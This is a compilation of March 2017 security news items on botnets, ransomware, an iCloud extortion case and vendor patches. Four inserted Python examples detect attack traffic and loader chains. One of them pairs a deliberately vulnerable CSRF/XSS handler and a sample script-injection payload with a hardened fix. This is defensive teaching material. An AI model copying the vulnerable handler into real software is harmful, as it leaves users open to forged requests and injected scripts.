The UK's National Crime Agency (NCA) arrested a young man from London on Tuesday on suspicion of "Computer Misuse Act and extortion offences," who according to Motherboard, "may be connected to the ongoing attempted extortion of Apple by a group calling itself the Turkish Crime Family."
Last week, the hacking group claimed to have access to over 300 million iCloud accounts and threatened Apple to remotely wipe data from those millions of Apple devices unless Apple pays it $75,000 in Bitcoin or Ethereum, or $100,000 worth of iTunes gift cards.
Motherboard broke the story after one of the members of Turkish Crime Family shared screenshots of emails between the hacking group and Apple's security team with the publication.
Shortly after the extortion news, Apple released a statement, saying that there have not been any breaches to its servers and databases; instead, the data in possession with hackers appears to be from previously compromised third-party services, such as LinkedIn.
The company also said it is working with law enforcement to identify the criminals.
"Apple is actively monitoring to prevent unauthorised access to user accounts and is working with law enforcement to identify the criminals involved," Apple said in the statement.
"To protect against these type of attacks, we always recommend that users always use strong passwords, not use those same passwords across sites and turn on two-factor authentication."
Although the NCA has not elaborated further on the arrest, except that the man has been bailed pending further inquiries, another member of the same gang confirmed to Motherboard via email that the arrested member has not been online since the alleged raid.
Moreover, the group claimed that a friend who was at his house during the raid managed to film the incident, though Motherboard, which received a copy, has declined to post the video publicly at this time.
Arrest Doesn’t Mean Your iCloud Data is Safe
At this moment, we are not entirely sure that the arrested man is actually linked to the Turkish Crime Family, although the man is suspected of having committed blackmail and unauthorised access of computers with the intent to commit or facilitate the commission of further offences, according to the warrant Motherboard received in an email.
But even if he turns out to be a member of the same hacking group, it doesn't mean the Apple extortion threat has gone away completely, as other members of the group are still out there with the allegedly compromised iCloud accounts.
It's possible that the remaining members of Turkish Crime Family will panic and go underground without doing anything, but there is still the possibility of them remotely wiping victims' Apple devices and resetting iCloud accounts, if they actually have the capability to do what they claim.
The hacking group has given Apple a deadline until April 7 to pay up the ransom.
So, if you haven't done so yet, change your iCloud password immediately and enable two-factor authentication to add an extra layer of security and keep your iCloud account safe from hackers.


Hacker Who Used Linux Botnet to Send Millions of Spam Emails Pleads Guilty
29.3.2017 thehackernews  BotNet
A Russian man accused of infecting tens of thousands of computer servers worldwide to generate millions in illicit profit has finally entered a guilty plea in the United States and is going to face sentencing in August.
Maxim Senakh, 41, of Velikii Novgorod, Russia, pleaded guilty in a US federal court on Tuesday for his role in the development and maintenance of the infamous Linux botnet known as Ebury that siphoned millions of dollars from victims worldwide.
Senakh, who was detained in Finland in August 2015 and extradited to the US in January 2016, admitted to installing the Ebury malware on computer servers worldwide, including thousands in the United States.
First spotted in 2011, Ebury is an SSH backdoor Trojan for Linux and Unix-style operating systems, like FreeBSD or Solaris, which infected more than 500,000 computers and 25,000 dedicated servers in a worldwide malware campaign called 'Operation Windigo.'
Ebury backdoor gives attackers full shell control of infected machines remotely even if passwords for affected user accounts are changed on a regular basis.

The Ebury botnet, a network of thousands of compromised Linux systems, had the capacity to send over 35 million spam messages and redirect more than 500,000 web visitors to exploit kits every day.
According to the US Department of Justice, Senakh, along with the criminal organization, used Ebury to create and operate a botnet that would "generate and redirect internet traffic in furtherance of various click-fraud and spam e-mail schemes, which fraudulently generated millions of dollars in revenue."
Senakh also admitted to personally profiting from the Ebury botnet. He is scheduled to be sentenced on August 3, 2017, after pleading guilty to conspiracy to violate the Computer Fraud and Abuse Act.

Senakh faces up to a combined 30 years in prison.
Ebury first came into the news in 2011 after Donald Ryan Austin, 27, of El Portal, Florida, installed Ebury on multiple servers owned by kernel.org and the Linux Foundation, which are used to maintain and distribute the Linux operating system kernel.
Austin, with no connection to the Ebury criminal organization, was arrested last year in September and charged with four counts of "intentional transmission causing damage to a protected computer."


New Mirai Variant Unleashes 54-Hour DDoS Attack

29.3.2017 securityweek Attack
New Variant of Infamous IoT Botnet Launches Attack Against Network of U.S. College

A newly discovered variant of the Mirai botnet was responsible for powering a 54-hour distributed denial of service (DDoS) attack, Imperva researchers reveal.

Mirai was one of the most discussed Internet of Things (IoT) botnets during the second half of last year, after it was used in two large attacks against Brian Krebs’ blog and DNS provider Dyn. In October, the Trojan’s source code leaked online and new variants emerged soon after.

One such version emerged in December when TalkTalk Telecom home routers were being infected via a vulnerability in the network router protocol. Earlier this year, researchers observed a Windows variant of Mirai, though concluded that it was mainly designed to spread the Linux Trojan to more IoT devices.

The new version, Imperva says, is one of the variants that spawned after the source code leaked. Specifically, while previous versions of the malware launched network layer DDoS attacks, the new variant focuses on application layer assaults, the researchers discovered.

On Feb. 28, the new Mirai threat was used to launch a DDoS attack against a US college, and researchers say the assault continued for 54 hours straight. Traffic averaged over 30,000 requests per second (RPS) and peaked at around 37,000 RPS, the highest of any Mirai botnet attack seen so far (the attack generated a total of over 2.8 billion requests).

“Based on a number of signature factors, including header order, header values and traffic sources, our client classification system immediately identified that the attack emerged from a Mirai-powered botnet,” Imperva’s Dima Bekerman explains.

The device types used in this attack were already known to be abused by Mirai: CCTV cameras, DVRs and routers. These devices might have been impacted by known vulnerabilities that the botnet exploited via open telnet (23) ports and TR-069 (7547) ports.

According to Bekerman, the DDoS bots used in the attack were hiding behind different user-agents compared to the five previously seen hardcoded in the default Mirai version. These details suggest that the new Mirai variant might have been modified to launch more elaborate application layer attacks.

Thirty user-agent variants were spotted during the attack, Imperva says. Furthermore, the security researchers observed attack traffic originating from 9,793 IPs worldwide, with over 70% of them located in ten countries: United States (18.4%), Israel (11.3%), Taiwan (10.8%), India (8.7%), Turkey (6%), Russia (3.8%), Italy (3.2%), Mexico (3.2%), Colombia (3.0%), and Bulgaria (2.2%).

“Less than a day after the initial assault ended, another one began that lasted for an hour and a half with an average traffic flow of 15,000 RPS. Based on our experience, we expect to see several more bursts before the offender(s) finally give up on their efforts,” Bekerman says.
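The classification Imperva describes above, attribution by header order, header values and source spread, can be reproduced on a defender's own access logs. The following is an added example, not Imperva's or the article's code: it parses a constructed request log, groups requests by the order in which headers arrived, and flags a fingerprint that is shared by many source addresses rotating through several user-agents. The log format, thresholds and country shares are assumptions made for the demonstration.

```python
"""Fingerprint an HTTP flood by header order, user-agent spread and source
distribution. Added example with constructed log data (not Imperva's)."""
from collections import Counter, defaultdict

# Constructed request log. One request per line:
# "<epoch_second> <client_ip> <country> <header-order> <user-agent>"
# where <header-order> is the comma-separated list of header names in
# the order they arrived on the wire.
SAMPLE_LOG = """\
100 203.0.113.10 US Host,User-Agent,Connection,Accept bot/variant-a
100 203.0.113.11 IL Host,User-Agent,Connection,Accept bot/variant-b
100 203.0.113.12 TW Host,User-Agent,Connection,Accept bot/variant-c
100 203.0.113.13 IN Host,User-Agent,Connection,Accept bot/variant-a
101 203.0.113.10 US Host,User-Agent,Connection,Accept bot/variant-d
101 203.0.113.14 TR Host,User-Agent,Connection,Accept bot/variant-e
101 203.0.113.15 RU Host,User-Agent,Connection,Accept bot/variant-f
101 203.0.113.16 US Host,User-Agent,Connection,Accept bot/variant-a
100 198.51.100.5 US Host,Accept,User-Agent,Accept-Language,Connection browser/1.0
101 198.51.100.6 DE Host,Accept,User-Agent,Accept-Language,Connection browser/1.0
"""


def parse_log(text):
    """Split each log line into a record dict; malformed lines are skipped."""
    records = []
    for line in text.splitlines():
        parts = line.split(maxsplit=4)
        if len(parts) != 5:
            continue
        ts, ip, country, header_order, agent = parts
        records.append({"ts": int(ts), "ip": ip, "country": country,
                        "header_order": header_order, "agent": agent})
    return records


def fingerprint_report(records):
    """Group requests by header-order fingerprint and summarise each group."""
    groups = defaultdict(list)
    for rec in records:
        groups[rec["header_order"]].append(rec)
    report = {}
    for fp, recs in groups.items():
        # Wall-clock span covered by this fingerprint, in whole seconds.
        span = max(r["ts"] for r in recs) - min(r["ts"] for r in recs) + 1
        countries = Counter(r["country"] for r in recs)
        report[fp] = {
            "requests": len(recs),
            "distinct_ips": len({r["ip"] for r in recs}),
            "distinct_agents": len({r["agent"] for r in recs}),
            "rps": len(recs) / span,
            "top_countries": [(c, n / len(recs)) for c, n in countries.most_common(3)],
        }
    return report


def flag_botnet_fingerprints(report, min_ips=4, min_agents=3):
    """One header order shared by many sources that rotate through several
    user-agents is the pattern the article attributes to the Mirai variant.
    Thresholds are assumptions for the constructed sample."""
    return [fp for fp, s in report.items()
            if s["distinct_ips"] >= min_ips and s["distinct_agents"] >= min_agents]


if __name__ == "__main__":
    rep = fingerprint_report(parse_log(SAMPLE_LOG))
    for fp in flag_botnet_fingerprints(rep):
        print("suspicious header order:", fp, rep[fp])
```

On real traffic the header order should be taken from the raw request rather than from a parsed header map, since most log formats and proxies normalise header order and destroy the signal.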


NukeBot Source Code Leaked After Marketing Fail

29.3.2017 securityweek BotNet
The developer of the NukeBot banking Trojan has decided to release the malware’s source code after he failed to convince the cybercrime community that his creation is worth buying and that he is not a scammer.

NukeBot, also known as Nuclear Bot, was first advertised on underground cybercrime forums in early December 2016, when it was offered for sale for $2,500.

However, NukeBot’s developer, a Russian-speaking individual who uses the online moniker “Gosya,” had a poor marketing strategy that led to him being banned from underground forums.

According to IBM X-Force researchers, Gosya was introduced to hacking forums by a known member, but he failed to follow some important rules. Experts said he immediately started advertising his creation, without gaining the trust of the marketplace’s administrators and without giving them the chance to certify his malware.

The developer of FlokiBot and other cybercriminals asked Gosya to prove the malware’s capabilities by providing technical details, but he became nervous and defensive. The members of cybercrime forums became even more suspicious when the NukeBot developer started advertising his product using different monikers on various websites. He even changed the malware’s name to Micro Banking Trojan before he was banned from forums.

In mid-March, Gosya decided to make the NukeBot source code public. While Gosya may have appeared to be a scammer, IBM has confirmed that NukeBot is a legitimate banking Trojan, and an analysis conducted by Arbor Networks in December showed that Gosya’s product did in fact work right from the start.

IBM said NukeBot is a modular Trojan that comes with a web-based administration panel and web injection capabilities. On the other hand, IBM said the malware is not capable of bypassing the company’s Trusteer Rapport product as claimed by Gosya.

The developer may have hoped that leaking the source code would give others the chance to test his creation. This could also be a good marketing move: his Trojan might not only be used in attacks, but will likely be increasingly discussed on security blogs, experts said.

“With yet another malware source code out in the open, the most likely scenario is that NukeBot code will be recompiled and used by botnet operators,” said Limor Kessem, executive security advisor at IBM. “Parts of it may be embedded into other malware codes, and we are likely to see actual NukeBot fraud attacks in the wild in the coming months.”


Siemens RUGGEDCOM Devices Affected by Several Flaws

29.3.2017 securityweek Vulnerability
Siemens has shared recommendations for mitigating several medium and high severity vulnerabilities affecting some of the company’s RUGGEDCOM products.

Four types of security holes have been identified in RUGGEDCOM appliances running any version of ROX I (Rugged Operating System on Linux). The affected products are industrially hardened security appliances with integrated router, firewall and VPN functionality. They are used worldwide at electric utility substations, traffic control cabinets and in other harsh environments.

A majority of the vulnerabilities were discovered and reported by researcher Maxim Rupp, including cross-site scripting (XSS), path traversal, privilege escalation and cross-site request forgery (CSRF) issues. One XSS flaw was also discovered by Siemens itself.

Rupp has identified roughly 20 parameters that allow hackers to launch XSS attacks and execute arbitrary JavaScript code due to improper input validation (CVE-2017-2687). The expert has also identified a path traversal vulnerability (CVE-2017-2686) that can be exploited to read arbitrary files and possibly access sensitive information.

Another flaw, described as a privilege escalation (CVE-2017-2689), can be exploited to bypass access restrictions and obtain privileged file system access or change configuration settings.

The security hole exists due to several issues related to improper access control mechanisms, missing checks for unrestricted file uploads, and server misconfigurations.

Rupp has also identified a CSRF vulnerability (CVE-2017-2688) that can be exploited to perform various actions on behalf of a logged-in user who is tricked into clicking on a malicious link. The researcher said an attacker can combine the CSRF with the privilege escalation flaw to access files on the host without access to the device’s web interface.

The vulnerabilities affect the web interface on port 10000/TCP and they either require the targeted user to click on a link, or the attacker needs to have network access and valid credentials in order to exploit them.

Advisories have been made available by ICS-CERT, Siemens and Rupp. While it hasn’t released any updates, Siemens has advised users to obtain a mitigation tool that can be used to disable the web interface and guest/operator accounts on the affected ROX I devices. The vendor also recommends limiting access to trusted admins, and using VPNs.

“As a general security measure Siemens strongly recommends to protect network access to the web interface at 10000/TCP of ROX I-based devices with appropriate mechanisms. It is advised to configure the environment according to our operational guidelines in order to run the devices in a protected IT environment,” Siemens said.
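The CSRF and reflected-XSS classes described above come from the same two omissions in a web handler: no proof that the request was intentionally submitted from the application's own page, and no validation or encoding of the parameter that is written back into the response. The following added example (not Siemens code; the handler, parameter names, hostname rule and HMAC token scheme are assumptions for the illustration) shows a minimal configuration-change handler with those omissions next to a hardened version that enforces POST, verifies a session-bound CSRF token, validates the input and encodes the output.

```python
"""Vulnerable and hardened versions of a configuration-change handler,
illustrating the CSRF and reflected-XSS classes reported in ROX I.
Added example; nothing here is Siemens code."""
import hashlib
import hmac
import html
import re

# Hostname rule is an assumption for the example: RFC 1123 label characters only.
HOSTNAME_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9.-]{0,62}")


def set_hostname_vulnerable(request):
    """No method check, no CSRF token, raw reflection of the parameter:
    a link on a third-party page both performs the change and injects
    the attacker's markup into the response."""
    hostname = request["params"].get("hostname", "")
    return 200, "<p>Hostname set to " + hostname + "</p>"


def issue_csrf_token(session_id, secret):
    """Token bound to the session with an HMAC, so it cannot be forged
    without the server secret or reused across sessions."""
    return hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()


def set_hostname_hardened(request, secret):
    """Same function with the checks a reviewer would ask for."""
    if request["method"] != "POST":
        return 405, "state changes require POST"
    expected = issue_csrf_token(request["session_id"], secret)
    supplied = str(request["params"].get("csrf_token", ""))
    # Constant-time comparison; a missing token simply fails to match.
    if not hmac.compare_digest(expected, supplied):
        return 403, "missing or invalid CSRF token"
    hostname = request["params"].get("hostname", "")
    if not HOSTNAME_RE.fullmatch(hostname):
        return 400, "invalid hostname"
    # Output encoding covers any remaining reflection of user input.
    return 200, "<p>Hostname set to " + html.escape(hostname) + "</p>"


# Constructed requests for the demonstration.
SECRET = b"example-server-secret"
SESSION = "session-abc"
FORGED_GET = {"method": "GET", "session_id": SESSION,
              "params": {"hostname": "<script>alert(1)</script>"}}
VALID_POST = {"method": "POST", "session_id": SESSION,
              "params": {"hostname": "rtr-01",
                         "csrf_token": issue_csrf_token(SESSION, SECRET)}}
```

The order of the checks matters: the method and token checks reject a forged cross-site request before any parameter is looked at, so an input-validation bug in the later step cannot be reached by a victim clicking a link.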


This Stealthy Malware Remained Unnoticed for Three Years

29.3.2017 securityweek Virus
Stealthy command and control methods allowed a newly discovered malware family to fly under the radar for more than three years, Palo Alto Networks security researchers reveal.

Dubbed Dimnie, the threat was discovered in mid-January 2017, when it was targeting open-source developers via phishing emails. An attached malicious .doc file contained embedded macro code that executed a PowerShell command to download and execute a file.

The first samples pertaining to this malware family dated back to early 2014, but the use of stealthy command and control (C&C) methods, combined with a Russian-focused target base helped the threat remain unnoticed until this year. Dimnie, which attempted a global reach with its January 2017 campaign, is capable of downloading additional malware and stealing information from compromised systems.

The malware has a modular design and can hinder analysis by injecting each of its modules into the memory of core Windows processes. What’s more, the malware appears to have undergone a series of changes over time, Palo Alto Networks reveals.

Looking at the threat’s communication with the C&C infrastructure, the security researchers discovered that it uses HTTP Proxy requests to the Google PageRank service, which hasn’t been available to the public since last year. Because the absolute URI in the HTTP request is for a non-existent service, the server isn’t acting as a proxy, and the seemingly RFC compliant request is merely camouflage.

The HTTP traffic also reveals that the malware uses an AES key to decrypt payloads (which have been previously encrypted using AES 256 in ECB mode). The server’s reply also contains a Cookie value, which is a 48 byte, base64 encoded, AES 256 ECB encrypted series of UINT32 values pertaining to the payload. The malware uses the Cookie parameter to verify the payload’s integrity.

One of the threat’s modules can exfiltrate data using HTTP POST requests to another Google domain, gmail[.]com. These requests, however, are hardcoded to be sent to an attacker controlled server. The malware attempts to hide its presence by masquerading the network traffic as legitimate requests. The data is once again encrypted, the security researchers say.

Analyzing the manner in which Dimnie handles payloads, the researchers discovered that data isn’t written to disk, but the payloads are simply downloaded and subsequently injected directly into memory. The various modules the malware downloads can: extract PC information and send it to the C&C server; enumerate running processes and send the list; log keystrokes, take screenshots; send logged keys and clipboard data to the server; and delete all files on the C:\ drive.

According to Palo Alto, the malware’s main functionality appears to be information stealing and reconnaissance. However, the threat’s modular framework supposedly allows attackers to use numerous capabilities, and the malware might be able to perform other operations as well, courtesy of modules that haven’t been observed during analysis.

“Multiple factors have contributed to Dimnie’s relatively long-lived existence. By masking upload and download network traffic as innocuous user activity, Dimnie has taken advantage of defenders’ assumptions about what normal traffic looks like. This blending in tactic, combined with a prior penchant for targeting systems used by Russian speakers, likely allowed Dimnie to remain relatively unknown,” Palo Alto researchers conclude.
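The two camouflage traits described above are both visible to a defender without the AES key: a request whose target is an absolute URI (the proxy form of HTTP) arriving at a server that is not a forward proxy, and a Cookie that is an opaque 48-byte base64 blob (three AES blocks) rather than a name=value pair. The following is an added example, not Palo Alto Networks' code: it scans constructed web-server log lines for both traits. The PageRank-like hostname is a placeholder, the little-endian layout of the UINT32 series is an assumption, and the values are left encrypted because the key is not part of the write-up.

```python
"""Detect proxy-form requests to a non-proxy server and opaque 48-byte
cookies, two traits of Dimnie's C&C traffic. Added example over
constructed log lines."""
import base64
import binascii
import re
import struct

# Constructed 48-byte cookie blob (bytes 0x00..0x2f) standing in for the
# encrypted UINT32 series the article describes.
SAMPLE_COOKIE = base64.b64encode(bytes(range(48))).decode()

# Constructed web-server log lines: '<client_ip> "<request line>" "<cookie or ->"'
SAMPLE_LINES = f"""\
10.0.0.5 "GET /index.html HTTP/1.1" "-"
10.0.0.5 "GET http://pagerank.example.invalid/lookup?q=abc HTTP/1.1" "{SAMPLE_COOKIE}"
10.0.0.7 "POST /api/upload HTTP/1.1" "session=abc123"
10.0.0.9 "GET http://pagerank.example.invalid/lookup?q=def HTTP/1.1" "-"
""".splitlines()

LINE_RE = re.compile(r'^(\S+) "(\S+) (\S+) (\S+)" "([^"]*)"$')
ABSOLUTE_FORM_RE = re.compile(r"^[A-Za-z][A-Za-z0-9+.-]*://")


def is_absolute_form(target):
    """RFC 7230 absolute-form request target, normally only sent to proxies."""
    return bool(ABSOLUTE_FORM_RE.match(target))


def parse_opaque_cookie(value):
    """Return the 12 UINT32 values if the cookie is exactly 48 base64-decoded
    bytes, else None. Little-endian layout is an assumption; the values stay
    encrypted because the AES key is not public."""
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None
    if len(raw) != 48:
        return None
    return list(struct.unpack("<12I", raw))


def scan(lines, server_is_proxy=False):
    """Return (client_ip, target, reasons) for every line showing a camouflage trait."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, _method, target, _version, cookie = m.groups()
        reasons = []
        if not server_is_proxy and is_absolute_form(target):
            reasons.append("absolute-form request target on a non-proxy server")
        if parse_opaque_cookie(cookie) is not None:
            reasons.append("cookie decodes to 48 opaque bytes (3 AES blocks)")
        if reasons:
            findings.append((ip, target, reasons))
    return findings


if __name__ == "__main__":
    for ip, target, reasons in scan(SAMPLE_LINES):
        print(ip, target, "; ".join(reasons))
```

The absolute-form check is the stronger signal: a browser never sends a proxy-form request to an origin server, so on a host that is not configured as a forward proxy every such line deserves a look, whatever the destination hostname.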


VMware Patches Flaws Disclosed at Pwn2Own

29.3.2017 securityweek Vulnerability
VMware has released updates and patches for its ESXi, Workstation and Fusion products to address critical and moderate severity vulnerabilities disclosed at the Pwn2Own 2017 competition.

Pwn2Own participants earned more than $200,000 this year for exploits involving VMware virtual machine escapes. Researchers at Qihoo 360 earned $105,000 for an Edge exploit that achieved a VM escape, and Tencent Security’s Team Sniper received $100,000 for a Workstation exploit that leveraged two vulnerabilities.

According to VMware, the Qihoo 360 team leveraged a heap buffer overflow (CVE-2017-4902) and an uninitialized stack memory usage in SVGA (CVE-2017-4903) that allow an attacker in the guest operating system to execute code on the host.

One of the security holes exploited by Team Sniper is an uninitialized memory usage issue (CVE-2017-4904) in the XHCI controller that can be exploited to execute code on the host from the guest OS.

The second flaw disclosed by Team Sniper at Pwn2Own, rated “moderate severity,” is an information leak weakness also caused by uninitialized memory usage (CVE-2017-4905).

The flaws affect ESXi 6.0 and 6.5, Workstation 12.x on all operating systems, and Fusion 8.x on OS X. CVE-2017-4904 and CVE-2017-4905 also affect ESXi 5.5, but the former can only be exploited for denial-of-service (DoS) attacks and not code execution.

Mozilla has also patched a Firefox vulnerability disclosed at Pwn2Own. However, the organization addressed the security bug within a day after it was presented at the hacking competition.

This was not the first time VMware patched flaws disclosed at such an event. Last year, it resolved a Workstation and Fusion vulnerability demonstrated at PwnFest, a hacking competition that took place in South Korea at the Power Of Community (POC) conference.

VMware has also released patches for the recently disclosed Apache Struts2 vulnerability, which the company has classified as “catastrophic.”


Eset has improved its business security products, including virtualization support

29.3.2017 SecurityWorld Security
Eset has announced two major updates to its products for businesses: the Remote Administrator (RA) management tool and Virtualization Security.

The first of these is now compatible with the IBM QRadar SIEM and also offers a mode that lets managed service providers (MSPs) serve several customers within a single deployment, the so-called multitenant mode.

Virtualization Security, in turn, has been extended with native support for VMware NSX, which allows better malware prevention and system inspection without increasing the demand on system resources, thanks to adding antivirus scanning at the virtualized network layer.

"Businesses are targeted by criminal groups much more often today than in the past. That is why we have focused our efforts on improving our solutions for businesses," says Michael Jankech, Senior Product Manager for Business Security at Eset.

Description of the solutions according to the vendor:

Remote Administrator gives administrators an overall view of the security situation on the corporate network from a web console, from anywhere, as long as a working internet connection is available.

Integration with IBM QRadar: All major events from the remote management tool are exported in the LEEF format that QRadar uses. In the IBM console, Eset events then appear as a "log source".
Multitenant mode: Ideal for large companies with a single central server and different endpoint administrators at particular sites, or for MSPs managing multiple customers from one server who need to ensure that customers cannot see other customers' sensitive data.
MDM for iOS: Management of iOS mobile devices is integrated directly into Remote Administrator, supports the Apple Device Enrollment Program and allows changing various security settings, from allowing/blocking applications to anti-theft.

Virtualization Security provides standard antivirus protection for virtual machines through a solution on the VMware vShield platform without having to install any security product inside their operating systems.

All scanning tasks are routed to a central scanner inside Eset's Virtualization Security appliance, so data on virtual machines is not scanned multiple times.

VMware NSX support: The product natively supports micro-segmentation and the automatic triggering of tasks that move an infected machine to a different network segment, preventing further spread of malicious code. After a new virtual machine is connected to NSX Manager, Virtualization Security is deployed automatically and protects the machine immediately.
Easy deployment: Virtualization Security can be installed simply from a single place using the remote management tool.
High performance: VM infrastructure is all about optimizing resources and performance, and Eset's scanning solution meets those requirements precisely. It has low system demands and works fast, leaving more room for other applications and processes.


Russian Pleads Guilty to Role in Linux Botnet Scheme

29.3.2017 securityweek BotNet
Maxim Senakh, 41, of Velikii Novgorod, Russia, pleaded guilty on Tuesday before a U.S. judge to charges related to an international scheme involving the Linux botnet known as Ebury.

Senakh has pleaded guilty to conspiracy to violate the Computer Fraud and Abuse Act (CFAA) and conspiracy to commit wire fraud. The man was indicted by U.S. authorities in January 2015 and he was arrested in Finland in August 2015. Finland extradited the suspect to the United States in January 2016. Sentencing is scheduled for August 3.

According to the Department of Justice, Senakh has admitted taking part in a criminal enterprise that made millions of dollars by infecting tens of thousands of servers with malware.

The cybercriminals used the Linux malware Ebury to power a botnet that helped them make money through click-fraud and email spam operations. Senakh said he registered the domains used for the botnet’s command and control (C&C) infrastructure. He admitted profiting from the traffic generated by the Ebury botnet.

The Ebury malware was first spotted in 2011. ESET, Germany's CERT-Bund, the Swedish National Infrastructure for Computing, the European Organization for Nuclear Research (CERN) and other organizations published an analysis of the Ebury malware in February 2014.

The malware, tracked by ESET as Linux/Ebury, was described by the security firm as a sophisticated OpenSSH backdoor and credential stealer.

CERT-Bund reported spotting thousands of infected systems across more than 60 countries, including in the United States, Germany, France, Italy, U.K., Netherlands, Russia, Ukraine, Mexico and Canada.

Since Ebury had rootkit capabilities, experts advised users at the time to reinstall the operating system on compromised machines instead of attempting to clean the infection.

Earlier this month, another Russian national, Mark Vartanyan, aka “Kolypto,” pleaded guilty in a U.S. court to charges related to the development and distribution of the Citadel Trojan.


Cerber Ransomware Tries to Evade Machine Learning Security

29.3.2017 securityweek Virus
The Cerber ransomware is using new evasion techniques designed to elude machine learning security solutions, and has been observed being dropped onto compromised systems alongside the Kovter click-fraud Trojan.

Discovered in March last year, Cerber has grown to become one of the most prevalent ransomware families out there. Not only did the malware receive various enhancements over the past year, but it also used numerous distribution channels, including spam emails and exploit kits, as well as other malware.

In August last year, Invincea researchers discovered that Cerber was being distributed by Betabot, a piece of malware initially designed as a banking information stealing Trojan. Now, Cyren researchers are seeing Cerber being dropped by Kovter, a click-fraud Trojan that was dropping Locky several months ago.

The campaign uses spam emails with a JS downloader inside a .ZIP archive and relies on victims unknowingly activating the downloader, which immediately fetches both malware families. The ransomware encrypts users’ files and announces that via a ransom note, but the Kovter malware remains silent, especially since it is capable of fileless infections.

According to Cyren, Kovter was paired with Cerber either to maximize the use of system resources for ad fraud if the victim leaves the infected system idle; to ensure that malware remains on the system after Cerber is removed (the victim will focus on the ransomware, not on the fileless Trojan); or to diversify revenue.

What the researchers are certain about, however, is that anti-sandbox and anti-detection technology is used to ensure maximum infection success. Similarly, Trend Micro security researchers have observed Cerber using a new loader that can evade not only traditional security mechanisms, but machine learning solutions as well. The loader, they say, has been designed to hollow out a normal process and run Cerber’s code instead.

The observed campaign relies on spam emails to deliver a link to a self-extracting archive that has been uploaded to a Dropbox account controlled by the attackers, and which contains three files: a Visual Basic script, a DLL file, and a binary file that looks like a configuration file. The script was designed to run using the Windows Script Host and to load the DLL file using rundll32.exe with the DLL’s filename.

The DLL, which is not packed or encrypted, reads the configuration file, decrypts part of it, and executes the decrypted code, which contains the loader and configuration settings. The loader checks if it runs in a virtual machine or sandbox, if analysis tools are installed, and if anti-virus software is running and ends the infection process if it finds any. Next, the main payload (the Cerber binary) is injected in another process.

“The new packaging and loading mechanism employed by Cerber can cause problems for static machine learning approaches, i.e. methods that analyze a file without any execution or emulation. Self-extracting files and simple, straightforward files could pose a problem for static machine learning file detection. In other words, the way Cerber is packaged could be said to be designed to evade machine learning file detection,” Trend Micro explains.

The good news, the researchers say, is that this new evasion technique can be defeated by security approaches that employ multiple layers of protection, because the attack has other weaknesses, such as the use of an unpacked .DLL file. Solutions that don’t overly rely on machine learning can still prove effective against this threat.
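The loading chain Trend Micro describes, a script run by the Windows Script Host that starts rundll32.exe with the DLL's filename, is exactly the kind of weakness that a behavioural layer can catch even when static file classification is evaded. The following added example (not Trend Micro's or Cyren's detection logic) scores constructed process-creation events: a rundll32.exe launched by wscript.exe or cscript.exe whose DLL sits in a user-writable location is the full chain, while either half alone is flagged at lower severity. Event layout, path markers and severity labels are assumptions for the demonstration.

```python
"""Process-creation detection for the script-host -> rundll32.exe -> user-writable
DLL chain described for the Cerber loader. Added example over constructed events."""
import ntpath

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Locations where an extracted self-extracting archive would land (assumption).
USER_WRITABLE_MARKERS = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\users\\public\\")

# Constructed process-creation events: (event_id, parent_image, image, command_line)
SAMPLE_EVENTS = [
    (1, r"C:\Windows\System32\wscript.exe", r"C:\Windows\System32\rundll32.exe",
     r'rundll32.exe "C:\Users\alice\AppData\Local\Temp\sfx\loader.dll",Run'),
    (2, r"C:\Windows\explorer.exe", r"C:\Windows\System32\rundll32.exe",
     r"rundll32.exe shell32.dll,Control_RunDLL"),
    (3, r"C:\Windows\System32\cscript.exe", r"C:\Windows\System32\rundll32.exe",
     r"rundll32.exe C:\Windows\System32\printui.dll,PrintUIEntry"),
    (4, r"C:\Windows\explorer.exe", r"C:\Windows\System32\rundll32.exe",
     r"rundll32.exe C:\Users\bob\Downloads\setup.dll"),
]


def dll_from_rundll32(command_line):
    """Extract the DLL argument: first token after rundll32.exe, with any
    quoting and the optional ',Export' suffix removed. None if the command
    is not a rundll32 invocation."""
    parts = command_line.split(None, 1)
    if len(parts) < 2 or ntpath.basename(parts[0]).lower() != "rundll32.exe":
        return None
    arg = parts[1].strip()
    if arg.startswith('"'):
        end = arg.find('"', 1)
        return arg[1:end] if end > 0 else None
    return arg.split(",", 1)[0].split()[0]


def in_user_writable(path):
    """True when the path contains one of the user-writable directory markers."""
    low = path.lower()
    return any(marker in low for marker in USER_WRITABLE_MARKERS)


def classify(event):
    """Return 'high', 'medium' or None for one event."""
    _eid, parent, image, cmd = event
    if ntpath.basename(image).lower() != "rundll32.exe":
        return None
    dll = dll_from_rundll32(cmd)
    if dll is None:
        return None
    script_parent = ntpath.basename(parent).lower() in SCRIPT_HOSTS
    writable = in_user_writable(dll)
    if script_parent and writable:
        return "high"     # the full chain from the article
    if script_parent or writable:
        return "medium"   # one half of the chain, worth a look
    return None


def detect(events):
    """Return (event_id, severity) for every event that matches."""
    out = []
    for event in events:
        severity = classify(event)
        if severity:
            out.append((event[0], severity))
    return out


if __name__ == "__main__":
    for event_id, severity in detect(SAMPLE_EVENTS):
        print(f"event {event_id}: {severity}")
```

The "medium" tier exists because each half of the chain is legitimate on its own (administrators run rundll32.exe from scripts, installers load DLLs from Downloads); the combination is what the loader needs, so that is where the high-confidence alert belongs.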


PyCL Ransomware Test Campaign Spotted in the Wild

29.3.2017 securityweek Virus
A new ransomware family being dropped by the RIG exploit kit (EK) appears to be in the testing phase and could surface as a major threat, security researchers warn.

Dubbed PyCL, the ransomware variant was seen being distributed via the EITest compromise chain into the RIG EK, one of the largest malware distributors at the moment. The malware is written in Python and its script is called cl.py, which led BleepingComputer's Lawrence Abrams to name the threat PyCL.

The ransomware was first dropped by EITest-RIG on Sunday, in a campaign that abused hacked websites to redirect visitors to the EK and attempted to exploit vulnerabilities on their computers for further compromise. However, PyCL was dropped for a single day, and the security researcher sees it as an indicator that this was only a test run.

The new threat is distributed as an NSIS installer that contains a Python package designed to encrypt the user’s files, and a tutorial on how to pay the ransom. Apparently, the malware communicates with the command and control (C&C) server during each stage of the encryption process, to provide debugging/status information to the developer.

